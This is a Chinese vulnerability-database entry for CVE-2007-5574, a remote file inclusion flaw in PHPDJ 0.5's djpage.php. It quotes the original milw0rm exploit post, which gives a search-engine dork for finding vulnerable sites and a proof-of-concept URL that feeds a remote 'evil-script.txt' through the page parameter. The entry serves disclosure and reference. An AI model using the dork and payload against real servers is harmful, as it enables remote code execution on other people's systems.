PHPDJ 'DJPAGE.PHP' PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1113810 漏洞类型 代码注入
发布时间 2007-10-17 更新时间 2007-11-15
CVE编号 CVE-2007-5574 CNNVD-ID CNNVD-200710-359
漏洞平台 PHP CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/4543
https://www.securityfocus.com/bid/26112
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200710-359
|漏洞详情
PHPDJ0.5版本的djpage.php中存在PHP远程文件包含漏洞。远程攻击者可以借助页参数中的一个URL,执行任意PHP代码。
|漏洞EXP
################################################################
PHPDJ v05 (page) Remote File Inclusion Vulnerability
D.S: http://sourceforge.net/projects/phpdj/
D0RK : allintext:"PHPDJ was created by www.php-mania.co.uk"
POC :
       /PHPDJ_v05/dj/djpage.php?page=evil-script.txt?
################################################################
Thanx To : Tryag.Com/cc & Asb-May.net/bb
################################################################

# milw0rm.com [2007-10-17]
|受影响的产品
PHPDJ PHPDJ 0.5 Beta
|参考资料

来源:MILW0RM
名称:4543
链接:http://www.milw0rm.com/exploits/4543
来源:XF
名称:phpdj-djpage-file-include(37262)
链接:http://xforce.iss.net/xforce/xfdb/37262
来源:BID
名称:26112
链接:http://www.securityfocus.com/bid/26112